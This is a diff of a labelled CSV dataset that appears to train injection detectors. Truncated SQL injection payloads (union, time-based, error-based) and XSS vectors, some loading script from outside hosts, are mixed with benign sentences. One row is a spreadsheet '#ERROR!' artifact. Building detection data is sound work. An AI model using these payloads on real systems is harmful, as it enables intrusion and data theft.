-"-4589"" ) union all select 1441,1441,1441,1441,1441",2,SQLi,14721 -"1"" ) ) union all select null,null,null--",2,SQLi,20721 -<template onpointerenter=alert(1)>XSS</template>,1,XSS,4555 -"))) AND ELT(1337=1337,SLEEP(5)) AND (((1337""=""1337",2,SQLi,11273 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7811 -"<frameset draggable=""true"" ondragenter=""alert(1)"">",1,XSS,6557 -1' where 2162 = 2162 procedure analyse ( extractva,2,SQLi,22299 -1'|| ( select 'xuof' from dual where 8794 = 8794 o,2,SQLi,15681 -( select ( case when ( 6035 = 9882 ) then 6035 els,2,SQLi,16108 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10666 -"<ruby onmouseover=""alert(1)"">test</ruby>",1,XSS,3372 -"-4653' or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,15404 -"<rt draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,4368 -1%' and ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,12504 -"<style onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,4239 -") or (1""=""1""/*",2,SQLi,9999 -Take 30 percent off select styles with code: PRES3,0,normal,25510 -"<noframes onmousedown=""alert(1)"">test</noframes>",1,XSS,6832 -"<style>@keyframes x{}</style><menuitem style=""anim",1,XSS,7518 -"1 ) union all select null,null,null,null,null,null",2,SQLi,21191 -select * from users where id = 1 +$ 1 or 1 = 1 -- ,2,SQLi,11468 -1%' and ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,18477 -1' ) where 1115 = 1115,2,SQLi,19527 -1'|| ( select 'lvso' where 5675 = 5675,2,SQLi,19469 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,15845 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10480 -"1%"" ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457",2,SQLi,21095 --7345 ) union all select 3866#,2,SQLi,18693 -"<sup onmousemove=""alert(1)"">test</sup>",1,XSS,8763 -<meta onpointerup=alert(1)>XSS</meta>,1,XSS,5762 -Select cocktail.,0,normal,24512 -select * from users where id = 1 or @$# = 1 union ,2,SQLi,11641 -"`""'><img src=xxx:x \x0Donerror=javascript:alert(1)",1,XSS,549 -"-8021' ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( c",2,SQLi,15398 -1' ) ) ) and 6510 = ( select count ( * ) from sysu,2,SQLi,20746 -"1"" ) where 9648 = 9648 and elt ( 1210 = 1210,sleep",2,SQLi,17873 -"{""id"":null,""firstName"":""Mee Siew"",""lastName"":""Huon",0,normal,27034 -select * from users where id = 1 or \.<$ union sel,2,SQLi,11953 -1 and 6414 = ( select count ( * ) from rdb$fields ,2,SQLi,20789 -"-8754"" ) ) ) union all select 7391,7391,7391,7391,",2,SQLi,18721 -"<t:set attributeName=""innerHTML"" targetElement=""x""",1,XSS,9320 -<abbr id=x tabindex=1 onactivate=alert(1)></abbr>,1,XSS,3945 -You will be able to find out very basic informatio,0,normal,25062 -<header onpointermove=alert(1)>XSS</header>,1,XSS,4309 -Bible - Visit your local Christian bookstore and s,0,normal,26321 -select * from users where id = '1' or \.< = 1 unio,2,SQLi,11694 -1 where 2060 = 2060,2,SQLi,13258 -"<mark onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5870 -Warner and Rubio are on the Senate Select Committe,0,normal,25179 -Where's the optometrist?,0,normal,23628 -"-3315"" ) ) ) union all select 2457,2457,2457,2457,",2,SQLi,15061 -1' or ( select 2* ( if ( ( select * from ( select ,2,SQLi,17739 -1 ) ) as fynx where 9636 = 9636 union all select n,2,SQLi,14976 +"<footer onmouseup=""alert(1)"">test</footer>",1,XSS,7984 +"<legend onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,5737 +"{""id"":null,""firstName"":""Adrian"",""lastName"":""Khong""",0,normal,26859 +<textarea oncut=alert(1) autofocus>XSS</textarea>,1,XSS,8512 +select * from users where id = '1' %!<@ union sele,2,SQLi,11388 +Find records where relevant.,0,normal,23455 +"1' and elt ( 3247 = 3969,3969 ) and 'xcbm' like 'x",2,SQLi,18390 +"select * from generate_series ( 5206,5206,case whe",2,SQLi,13917 +Top Senate Republicans are resisting a select comm,0,normal,25237 +1'|| ( select 'npdx' from dual where 9486 = 9486 a,2,SQLi,19322 +1' ) ) and 4386 = utl_inaddr.get_host_address ( ch,2,SQLi,13193 +I'm considering where to go for a cultural experie,0,normal,23880 +"-1830"" ) ) as bptv where 4805 = 4805 or 4144 = ( s",2,SQLi,15621 +"\'><SCRIPT>alert(String.fromCharCode(88,83,83))</S",1,XSS,1354 +<b onpointerover=alert(1)>XSS</b>,1,XSS,3905 +Where's your SQL assistance?,0,normal,23409 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7064 +"<object data=%22data:text/html;base64,PHNjcmlwdD4g",1,XSS,9239 +"1"" ) as xylo where 2112 = 2112 and 3715 in ( ( cha",2,SQLi,12349 +"-3234%"" ) ) or elt ( 1032 = 1032,3623 ) and ( ( ""%",2,SQLi,12374 +&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x,1,XSS,1098 +"<del draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5808 +"1, ( select ( case when ( 6857 = 7623 ) then 1 els",2,SQLi,19422 +"1"" ) ) and exp ( ~ ( select * from ( select concat",2,SQLi,20422 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,14714 +1 ) ) as epfz where 5471 = 5471,2,SQLi,16979 +<svg onpointerout=alert(1)>XSS</svg>,1,XSS,4557 +") AND ELT(1337=1337,SLEEP(5)) AND (1337"" LIKE ""133",2,SQLi,11275 +"<figcaption onkeyup=""alert(1)"" contenteditable>tes",1,XSS,7813 +"<ins onkeypress=""alert(1)"" contenteditable>test</i",1,XSS,6559 +-2411%' ) ) ) or 6872 = 6872 and ( ( ( '%' = ',2,SQLi,20321 +-3436 ) or 9281 = 3172,2,SQLi,15612 +1' ) where 4297 = 4297 or 2367 = ( select count ( ,2,SQLi,16100 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10668 +"<b onkeypress=""alert(1)"" contenteditable>test</b>",1,XSS,3374 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,15396 +<dialog onpointermove=alert(1)>XSS</dialog>,1,XSS,4370 +-3462' ) ) or 4493 = utl_inaddr.get_host_address (,2,SQLi,15265 +"<shadow onkeypress=""alert(1)"" contenteditable>test",1,XSS,4241 +) or '1′='1–,2,SQLi,10001 +Take an extra 20% off select clearance with code E,0,normal,25507 +"<meta onmouseup=""alert(1)"">test</meta>",1,XSS,6834 +<th onfocusout=alert(1) tabindex=1 id=x></th><inpu,1,XSS,7520 +1' and ( 1088 = 7530 ) *7530 and 'xkfu' = 'xkfu,2,SQLi,19157 +"select * from users where id = 1 or ""$&"" or 1 = 1 ",2,SQLi,11470 +"-9583' ) ) union all select 6392,6392,6392,6392,63",2,SQLi,18475 +Retrieve data where required.,0,normal,23365 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,18466 +1 ) ) as mgvw where 4923 = 4923 union all select n,2,SQLi,15837 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10482 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,21093 +1 and 3707 = ( select count ( * ) from sysibm.syst,2,SQLi,18691 +<style>:target {color:red;}</style><col id=x style,1,XSS,8765 +"<body onmousemove=""alert(1)"">test</body>",1,XSS,5764 +Select water.,0,normal,24509 +"select * from users where id = '1' union select 1""",2,SQLi,11643 +"`""'><img src=xxx:x \x0Donerror=javascript:alert(1)",1,XSS,549 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,15390 +1 where 1656 = 1656 and 5556 = ( select count ( * ,2,SQLi,20744 +"{""id"":null,""firstName"":""Cammie"",""lastName"":""Sim"",""",0,normal,27451 +"{""id"":null,""name"":""layers""}",0,normal,27031 +"select * from users where id = 1 or 1#""1 union sel",2,SQLi,11955 +"1"" ) ) as riui where 2605 = 2605",2,SQLi,15309 +"1 and 3202 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,18719 +<textarea id=ta onfocus=%22write('<script>alert(1),1,XSS,9322 +<output onpointerleave=alert(1)>XSS</output>,1,XSS,3947 +1' ) ) rlike ( select ( case when ( 8489 = 8820 ) ,2,SQLi,16113 +<input3 onpointerover=alert(1)>XSS</input3>,1,XSS,4311 +Boxed beef prices were also stronger for choice an,0,normal,26318 +select * from users where id = 1 -@<@ union select,2,SQLi,11696 +"iif ( 3548 = 8646,1,1/0 )",2,SQLi,19272 +"<span draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,5872 +"We got tossed into the establishment lane, we didn",0,normal,25176 +Where's the emergency room?,0,normal,23625 +1%' and 6510 = ( select count ( * ) from sysusers ,2,SQLi,12817 +select ( case when ( 4719 = 8852 ) then 1 else 471,2,SQLi,17737 +"-1644%' or make_set ( 9354 = 9354,7185 ) and '%' =",2,SQLi,17838 "<style></style\x0A<img src=""about:blank"" onerror=j",1,XSS,449 -Order pizza.,0,normal,23019 -RLIKE SLEEP(5)-- 1337,2,SQLi,11210 --5585%' ) ) ) or 6990 = 7727,2,SQLi,21023 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,21338 -"1"" ) where 3390 = 3390",2,SQLi,16072 -Select execute.,0,normal,24751 -<x/onxxx=1,1,XSS,9365 -"<legend oncut=""alert(1)"" contenteditable>test</leg",1,XSS,7536 -"{""id"":null,""name"":""scared""}",0,normal,27129 -<th id=x tabindex=1 onfocusin=alert(1)></th>,1,XSS,7366 -1'+ ( select 'stdl' where 4581 = 4581,2,SQLi,18673 -"<svg onload=""javascript:alert(123)"" xmlns=""#""></sv",1,XSS,1128 -Where's the acupuncture clinic?,0,normal,23633 -"<source onclick=""alert(1)"">test</source>",1,XSS,4408 -<data onpointerleave=alert(1)>XSS</data>,1,XSS,1800 -"Then select write, and the word "" write "" will be ",0,normal,25340 -or '7659'='7659,2,SQLi,10090 -1'+ ( select oqvo where 7448 = 7448 union all sele,2,SQLi,13798 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2388 -"<u onmouseover=""alert(1)"">test</u>",1,XSS,3035 -"1"" where 4597 = 4597 rlike sleep ( 5 ) --",2,SQLi,15014 -<style>@keyframes slidein {}</style><summary style,1,XSS,5649 -1' in boolean mode ) and 6055 = ctxsys.drithsx.sn ,2,SQLi,18191 -Carefully select ingredients.,0,normal,24259 -"<p onmouseenter=""alert(1)"">test</p>",1,XSS,6067 -<var id=x tabindex=1 onactivate=alert(1)></var>,1,XSS,3513 -"<td onkeyup=""alert(1)"" contenteditable>test</td>",1,XSS,7001 -"select * from users where id = 1 union select 1<@,",2,SQLi,11634 -1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ,2,SQLi,20042 -Select libraries in select markets will be allowed,0,normal,25621 -select sleep ( 5 ) -- waln,2,SQLi,14471 -Sort the tangled wires.,0,normal,22667 -<style>:target {color:red;}</style><video id=x sty,1,XSS,7817 -1 ) ) ) waitfor delay '0:0:5' and ( ( ( 3481 = 348,2,SQLi,20518 -"<strong oncontextmenu=""alert(1)"">test</strong>",1,XSS,8132 -"<command onkeypress=""alert(1)"" contenteditable>tes",1,XSS,5759 -"<caption onkeyup=""alert(1)"" contenteditable>test</",1,XSS,4289 -"<nav onmousemove=""alert(1)"">test</nav>",1,XSS,6696 +Merge data.,0,normal,23016 +) RLIKE SLEEP(5) AND ('1337'='1337,2,SQLi,11212 +-6298' or 4724 = 4876,2,SQLi,13737 +"-5996 ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ",2,SQLi,14774 1'+ ( select pwvr where 3028 = 3028 or 6979 = like,2,SQLi,22092 -Aggregate data where needed.,0,normal,23288 -"When the annotations tool bar opens, select the pe",0,normal,25150 -Fetch records where valid.,0,normal,23271 -Select your fight.,0,normal,24914 -<figure onpointerdown=alert(1)>XSS</figure>,1,XSS,7803 -"Ebates, mentioned above, gives you a percentage of",0,normal,26217 -<ins onfocusout=alert(1) tabindex=1 id=x></ins><in,1,XSS,3261 -"1' ) and row ( 6237,7469 ) > ( select count ( * ) ",2,SQLi,15171 -"iif ( 2084 = 5671,1,1/0 )",2,SQLi,16102 -"select pg_sleep ( 5 ) and ""%"" = """,2,SQLi,14958 -<details id=x tabindex=1 onactivate=alert(1)></det,1,XSS,8274 -"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,22104 -Select a song to listen to.,0,normal,23988 -1' ) and 6414 = ( select count ( * ) from rdb$fiel,2,SQLi,16540 -<svg><noframes onload=alert(1)></noframes>,1,XSS,2841 -"1"" ) and 8514 = ( select count ( * ) from domain.d",2,SQLi,15495 -"<element draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,2616 -1 ) as mixt where 1085 = 1085 or sleep ( 5 ) --,2,SQLi,17981 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8370 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10610 -<embed id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,8422 -"<style>@keyframes x{}</style><progress style=""anim",1,XSS,3561 -"1"" ) as ranl where 5553 = 5553",2,SQLi,20620 -"-7122"" ) union all select 4002,4002,4002,4002,4002",2,SQLi,13726 -<span id=x tabindex=1 onactivate=alert(1)></span>,1,XSS,4082 -"<style>.XSS{background-image:url(""javascript:docum",1,XSS,1512 -1' ) ) as cjjm where 1981 = 1981,2,SQLi,14804 -"<bdo onmouseup=""alert(1)"">test</bdo>",1,XSS,5859 -<body onpointerout=alert(1)>XSS</body>,1,XSS,5282 -"1"" where 2462 = 2462 and 2716 = ( select count ( *",2,SQLi,12135 -"1', ( select ( case when ( 9644 = 9644 ) then dbms",2,SQLi,19898 -"1"" ) procedure analyse ( extractvalue ( 9627,conca",2,SQLi,15417 -<script id=x tabindex=1 onactivate=alert(1)></scri,1,XSS,7216 -"1"" ) ) as vtad where 3653 = 3653 procedure analyse",2,SQLi,16152 -"Click ""Day"" view and select the calendars you want",0,normal,26282 -"{""id"":null,""firstName"":""Ryan Low Low"",""lastName"":""",0,normal,26853 -"1%"" and ( 3020 = 3020 ) *6703 and ""%"" = """,2,SQLi,14938 +1'+ ( select 'supo' where 8691 = 8691,2,SQLi,17682 +GIF89a/*<svg/onload=alert(1)>*/=alert(document.dom,1,XSS,9367 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7538 +Select substitute.,0,normal,24760 +"<xmp ondblclick=""alert(1)"">test</xmp>",1,XSS,7368 +The majority of infant adoptions involve the birth,0,normal,25413 +"<iframe xmlns=""#"" src=""javascript:alert(1)""></ifra",1,XSS,1129 +Where's the podiatrist?,0,normal,23630 +"<b draggable=""true"" ondrag=""alert(1)"">test</b>",1,XSS,4410 +"<audio draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,1801 +One Child Nation opened in select theaters on Augu,0,normal,25826 +declare @s varchar (200) select @s = 0x73656c6 ...,2,SQLi,10092 +"1"" or 8421 = ( select count ( * ) from generate_se",2,SQLi,13791 +"<frame draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,2389 +"<main onpaste=""alert(1)"" contenteditable>test</mai",1,XSS,3036 +"-5190%"" or 8298 = 9306 and ""%"" = """,2,SQLi,15007 +"<textarea onmouseup=""alert(1)"">test</textarea>",1,XSS,5651 +"-3090"" or make_set ( 9354 = 9354,7185 ) and ""qowe""",2,SQLi,21385 +"{""id"":null,""firstName"":""Gowrie"",""lastName"":""Manogh",0,normal,27521 +<figcaption onpointerup=alert(1)>XSS</figcaption>,1,XSS,6069 +"<style>@keyframes x{}</style><p style=""animation-n",1,XSS,3515 +<dfn onfocusout=alert(1) tabindex=1 id=x></dfn><in,1,XSS,7003 +"select * from users where id = 1 or 1#"". union sel",2,SQLi,11636 +1' ) where 4092 = 4092 or char ( 75 ) ||char ( 70 ,2,SQLi,20040 +"Select McDonalds locations in Scotland, England, a",0,normal,25618 +1 ) and 3659 = 5475 and ( 8949 = 8949,2,SQLi,14464 +Where's the missing puzzle piece?,0,normal,22664 +"<element draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,7819 +1'|| ( select 'avxz' from dual where 7815 = 7815,2,SQLi,20516 +<form id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,8134 +"<dl draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,5761 +"<rt onkeypress=""alert(1)"" contenteditable>test</rt",1,XSS,4291 +"<tt oncut=""alert(1)"" contenteditable>test</tt>",1,XSS,6698 +"-1710"" ) ) as cvky where 1858 = 1858 union all sel",2,SQLi,16879 +Specify criteria where needed.,0,normal,23285 +"When you start the purchase, select the ""G Pay"" ic",0,normal,25147 +"-4400 union all select 3983,3983,3983,3983,3983,39",2,SQLi,17795 +"-3518 ) union all select 1877,1877,1877,1877#",2,SQLi,19102 +<isindex id=x tabindex=1 onfocusin=alert(1)></isin,1,XSS,7805 +-5970' where 2769 = 2769 union all select 2769--,2,SQLi,19419 +"<nav onmousedown=""alert(1)"">test</nav>",1,XSS,3263 +"1%' and 3202 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,13086 +1'+ ( select 'xqjx' where 7048 = 7048 and 9198 = 9,2,SQLi,13821 +"{""id"":null,""firstName"":""Pei"",""lastName"":""Kwan"",""ad",0,normal,27469 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8276 +1'|| ( select 'lxyu' from dual where 5789 = 5789 u,2,SQLi,22102 +I'm considering where to have a quiet retreat.,0,normal,23985 +1' ) ) and 9198 = 9198--,2,SQLi,20870 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2842 +1' ) ) as lizu where 7691 = 7691 or char ( 75 ) ||,2,SQLi,15487 +<isindex onpointermove=alert(1)>XSS</isindex>,1,XSS,2617 +1 where 5443 = 5443,2,SQLi,17979 +<object id=x tabindex=1 onactivate=alert(1)></obje,1,XSS,8372 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10612 +"<nextid draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,8424 +<style>:target {color:red;}</style><cite id=x styl,1,XSS,3563 +"1' ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171",2,SQLi,21108 +"select * from generate_series ( 3427,3427,case whe",2,SQLi,14616 +"<sup draggable=""true"" ondragend=""alert(1)"">test</s",1,XSS,4084 +"<style type=""text/css"">BODY{background:url(""javasc",1,XSS,1513 +"{""id"":null,""name"":""tide or""}",0,normal,27155 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5861 +"<dt onmouseout=""alert(1)"">test</dt>",1,XSS,5284 +1 ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ,2,SQLi,12137 +"1' ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,19158 +-7636' ) or 5898 = 8880 and ( 'sjuv' = 'sjuv,2,SQLi,21755 +<noscript id=x tabindex=1 onfocus=alert(1)></noscr,1,XSS,7218 +1' ) ) ) or 8315 = ( select count ( * ) from sysib,2,SQLi,16144 +"Click into the Notes Panel, open the notes you wan",0,normal,26279 +"-2855"" ) ) ) union all select 1496,1496,1496,1496#",2,SQLi,21397 +1 where 6827 = 6827,2,SQLi,14931 "ABC<div style=""x:\x0Dexpression(javascript:alert(1",1,XSS,474 -"1%"" ) ) ) and 6537 = dbms_pipe.receive_message ( c",2,SQLi,19186 -<input2 onpointerenter=alert(1)>XSS</input2>,1,XSS,7022 -"<video onmouseout=""alert(1)"">test</video>",1,XSS,1847 -"If you select ""2009"" in the list of years at the t",0,normal,26039 -1'|| ( select 'ojdz' where 7350 = 7350 and 6510 = ,2,SQLi,16495 -"-4513"" ) ) ) or 4144 = ( select upper ( xmltype ( ",2,SQLi,21908 -"<!-- injection --><svg height=""50px"">",1,XSS,9016 -"<rb onkeyup=""alert(1)"" contenteditable>test</rb>",1,XSS,8949 -"-1949"" ) ) as urke where 8761 = 8761 union all sel",2,SQLi,13642 -1' ) ) as eleh where 1347 = 1347 or 8421 = ( selec,2,SQLi,21936 -To ensure success with finer pitch requirements it,0,normal,25269 -"1"" ) ) as daqd where 4390 = 4390 and elt ( 3114 = ",2,SQLi,14648 -select * from users where id = 1. union select nul,2,SQLi,11611 -"<meta draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,5826 -"<applet oncut=""alert(1)"" contenteditable>test</app",1,XSS,1898 -"<center draggable=""true"" ondrag=""alert(1)"">test</c",1,XSS,1852 -"<BODY BACKGROUND=""javascript:alert('')"">",1,XSS,7158 -1 ) ) ) rlike ( select ( case when ( 4367 = 6879 ),2,SQLi,12861 -<;/script>;<;script>;alert(1)<;/script>;,1,XSS,1682 -&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.,1,XSS,1453 -"-2325' ) ) ) union all select 1442,1442,1442--",2,SQLi,20726 -`'><script>\x0Bjavascript:alert(535)</script>,1,XSS,8968 -ORDER BY 29#,2,SQLi,10302 -"1"" ) where 6367 = 6367 union all select null,null,",2,SQLi,17170 -select * from users where id = 1 +1 union select 1,2,SQLi,11729 -1,0,normal,26722 -Select burger.,0,normal,24496 -"-5187"" ) union all select 3373,3373#",2,SQLi,15197 -1' where 9602 = 9602,2,SQLi,12969 -(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#,2,SQLi,11149 -Join the race.,0,normal,22829 -"{""id"":null,""firstName"":""Sim"",""lastName"":""Daniel"",""",0,normal,27385 -<button onStorage=javascript:alert(1)>,1,XSS,9670 -"All About Nina, costarring Common, opens in select",0,normal,26393 -"1"" ) as idwa where 2545 = 2545 or 7552 = ( select ",2,SQLi,13863 +1' ) rlike sleep ( 5 ) and ( 'boto' = 'boto,2,SQLi,15675 +"<small ondblclick=""alert(1)"">test</small>",1,XSS,7024 +"<nav onclick=""alert(1)"">test</nav>",1,XSS,1848 +1 ) where 1193 = 1193 procedure analyse ( extractv,2,SQLi,20233 +1 ) as vxsh where 4706 = 4706,2,SQLi,16493 +1%' and 6240 = ( 'qqpjq'|| ( select case 6240 when,2,SQLi,16548 +<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG ,1,XSS,9018 +"<element onkeydown=""alert(1)"" contenteditable>test",1,XSS,8951 +1' ) ) as ytfi where 3323 = 3323 and 8148 = like (,2,SQLi,13635 +1' and sleep ( 5 ) and 'pfgy' = 'pfgy,2,SQLi,21934 +"To find out more, select from the left-hand naviga",0,normal,25266 +Select a gift.,0,normal,22786 +select * from users where id = '1' or 1^ = 1 union,2,SQLi,11613 +<style>:target {color: red;}</style><textarea id=x,1,XSS,5828 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1899 +<dd id=x tabindex=1 onbeforeactivate=alert(1)></dd,1,XSS,1853 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7160 +"-5928"" ) ) or elt ( 1032 = 1032,3623 ) and ( ( ""rg",2,SQLi,22314 +<;/br style=a:expression(alert())>;,1,XSS,1683 +&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.c,1,XSS,1454 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,20724 +`'><script>\x20javascript:alert(536)</script>,1,XSS,8970 +ORDER BY 31337#,2,SQLi,10304 +1'+ ( select 'fxhh' where 2571 = 2571 union all se,2,SQLi,17187 +""" or """"&""",2,SQLi,11731 +1' ) ) as lmsl where 3753 = 3753 or elt ( 5873 = 5,2,SQLi,13611 +Select dessert.,0,normal,24493 +"1 ) and row ( 6237,7469 ) > ( select count ( * ) ,",2,SQLi,16164 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12962 +#ERROR!,2,SQLi,11151 +1%' ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ,2,SQLi,15921 +1%' ) ) and 6510 = ( select count ( * ) from sysus,2,SQLi,18844 +<button onSyncRestored=javascript:alert(1)>,1,XSS,9672 +"All you have to do is select a walk and turn up, l",0,normal,26390 +1 ) or ( select 2* ( if ( ( select * from ( select,2,SQLi,21237 "<SCRIPT SRC=""http://xss.rocks/xss.jpg""></SCRIPT>",1,XSS,300 -";alert(String&#46;fromCharCode(88,83,83))//\';aler",1,XSS,1108 +";alert(String.fromCharCode(88,83,83))//\';alert(St",1,XSS,1109 http://www.google<script .com>alert(document.locat,1,XSS,851 -1' ) as upgb where 2031 = 2031,2,SQLi,12670 -"1%"" and 8594 = ( select 8594 from pg_sleep ( 5 ) )",2,SQLi,16676 -1'|| ( select 'zyvk' from dual where 2072 = 2072,2,SQLi,12264 -"1 and 4241 = convert ( int, ( select char ( 113 ) ",2,SQLi,14854 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2247 -"The embryo is provided with ten hooks, and appears",0,normal,25458 -)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11224 -><script+src=https://ui.comet.aol.com/?module=head,1,XSS,9801 -"<slot oncut=""alert(1)"" contenteditable>test</slot>",1,XSS,6384 -"<tbody draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,6087 -<option id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,4119 -"-9565"" where 1616 = 1616 union all select 1616,161",2,SQLi,21083 +1'|| ( select 'hvqw' from dual where 4423 = 4423 u,2,SQLi,12663 +select ( case when ( 7033 = 1594 ) then 7033 else ,2,SQLi,16674 +-9795 ) as wrgs where 5427 = 5427 union all select,2,SQLi,12266 +"-2916"" ) ) or 4946 = 8232--",2,SQLi,14847 +"<link onmouseover=""alert(1)"">test</link>",1,XSS,2248 +1 where 7464 = 7464 rlike ( select ( case when ( 7,2,SQLi,19637 +` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11226 +><script+src=http://search.twitter.com/trends.json,1,XSS,9803 +"<script onclick=""alert(1)"">test</script>",1,XSS,6386 +<article onfocusout=alert(1) tabindex=1 id=x></art,1,XSS,6089 +<tt id=x tabindex=1 onfocus=alert(1)></tt>,1,XSS,4121 +1' ) ) ) and 3707 = ( select count ( * ) from sysi,2,SQLi,12986 <svg><animate onbegin=alert(1) attributeName=x dur,1,XSS,9 -1%' ) ) and 9660 = ( select count ( * ) from all_u,2,SQLi,18956 -"<style>@keyframes x{}</style><param style=""animati",1,XSS,5368 -"-9398' union all select 3998,3998,3998,3998,3998,3",2,SQLi,21795 -1%' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ,2,SQLi,13695 -"<applet onpaste=""alert(1)"" contenteditable>test</a",1,XSS,4041 +Where did you find that inspiring park?,0,normal,23788 +<embed id=x onfocus=alert(1) type=text/html>,1,XSS,5370 +-8538%' or 5903 = ( 'qqpjq'|| ( select case 5903 w,2,SQLi,21793 +1' ) or exp ( ~ ( select * from ( select concat ( ,2,SQLi,13688 +<center onpointermove=alert(1)>XSS</center>,1,XSS,4043 "<meta charset=""mac-farsi"">¼script¾javascript:alert",1,XSS,717 -"<u onbeforecopy=""alert(1)"" contenteditable>test</u",1,XSS,7792 -1 ) ) as bgdm where 3473 = 3473 or updatexml ( 180,2,SQLi,19758 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,18931 --8074' ) or 4493 = utl_inaddr.get_host_address ( c,2,SQLi,14751 -"1"" ) ) rlike ( select ( case when ( 5342 = 1036 ) ",2,SQLi,19821 -1 ) ) and 2886 = 1133--,2,SQLi,20304 -1' ) ) or exp ( ~ ( select * from ( select concat ,2,SQLi,21695 -&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/,1,XSS,1370 -<video><source onerror=alert(1) src=1></video>,1,XSS,5102 -select * from users where id = 1 union select 1`\`,2,SQLi,11994 -1' or ( select 2* ( if ( ( select * from ( select ,2,SQLi,21681 -<s onfocusout=alert(1) tabindex=1 id=x></s><input ,1,XSS,3098 -"<th onmouseover=""alert(1)"">test</th>",1,XSS,6168 -"1 ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ",2,SQLi,18067 -"1"" ) as oztl where 6655 = 6655 or 8315 = ( select ",2,SQLi,15580 -"-7350' ) ) ) union all select 9207,9207,9207,9207-",2,SQLi,17755 -<x oncut=alert()>x,1,XSS,9573 -"{""id"":null,""name"":""coffee""}",0,normal,27334 +<center onpointerover=alert(1)>XSS</center>,1,XSS,7794 +"1"" ) ) as lfte where 3811 = 3811 or exp ( ~ ( sele",2,SQLi,19756 +1' ) where 5616 = 5616,2,SQLi,18929 +"{""id"":null,""firstName"":""Irene"",""lastName"":""Chan"",""",0,normal,27048 +The state's Republicans will select their Senate c,0,normal,25370 +-3978 or 4144 = ( select upper ( xmltype ( chr ( 6,2,SQLi,20302 +Modify the software settings.,0,normal,22588 +"&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))",1,XSS,1371 +<em id=x tabindex=1 onfocusin=alert(1)></em>,1,XSS,5104 +select * from users where id = '1' or \<1 or 1 = 1,2,SQLi,11996 +-8274' ) ) union all select 3048--,2,SQLi,21679 +<big id=x tabindex=1 onbeforeactivate=alert(1)></b,1,XSS,3099 +<shadow onpointermove=alert(1)>XSS</shadow>,1,XSS,6170 +Select a travel destination for exploration.,0,normal,24154 +"1%"" and 8148 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,15572 +-1796' ) or 4493 = utl_inaddr.get_host_address ( c,2,SQLi,21056 +<button onAbort=javascript:alert(1)>,1,XSS,9575 +"{""id"":null,""name"":""caught""}",0,normal,27333 "<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""tex",1,XSS,775 -<data id=x tabindex=1 